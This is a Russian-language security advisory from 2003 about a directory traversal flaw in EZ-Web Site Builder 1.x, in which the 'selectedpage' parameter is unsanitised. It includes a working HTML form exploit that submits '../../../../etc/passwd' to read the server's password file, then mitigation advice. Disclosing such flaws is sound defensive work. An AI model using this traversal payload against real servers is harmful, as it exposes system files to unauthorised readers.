| Дата публикации: | 05.09.2003 |
| Всего просмотров: | 1093 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Раскрытие важных данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | EZ-Web Site Builder 1.x |
Уязвимые версии: EZ-Web Site Builder 1.x Описание: Уязвимость обнаружена в EZ-Web Site Builder. Удаленный пользователь может получить доступ к произвольным файлам на уязвимом сервере. Программа должным образом не обрабатывает параметр "selectedpage" перед открытием файла, используя встроенный редактор. В результате удаленный пользователь может представить специально обработанное значение для параметра "selectedpage", чтобы получить доступ к файлам, расположенным вне wwwroot каталога. Пример/Эксплоит: <html><body><p><center> <b>Mein 31337 Exploit :-P</b><br> <form action="http://targethost.com/cgi-bin/sbcgi/sitebuilder.cgi" method=POST> <input type="hidden" name="username" value="targetuser"> <input type="hidden" name="password" value="targetpassword"> <input type="hidden" name="selectedpage" value="../../../../../../../../../../etc/passwd"> <p><input type="submit" name="action" value="Yes - Use Advanced Edi tor"> <p><input type="submit" value="Return to Site Builder"> </form> </center></body></html> URL производителя: http://newerascripts.com/ Решение: Ограничьте доступ к сайту доверенным пользователям. Отредактируйте исходный код, чтобы фильтровались злонамеренные символы. Используйте альтернативное программное обеспечение. |
|
| Ссылки: | Directory Traversal in SITEBUILDER - v1.4 |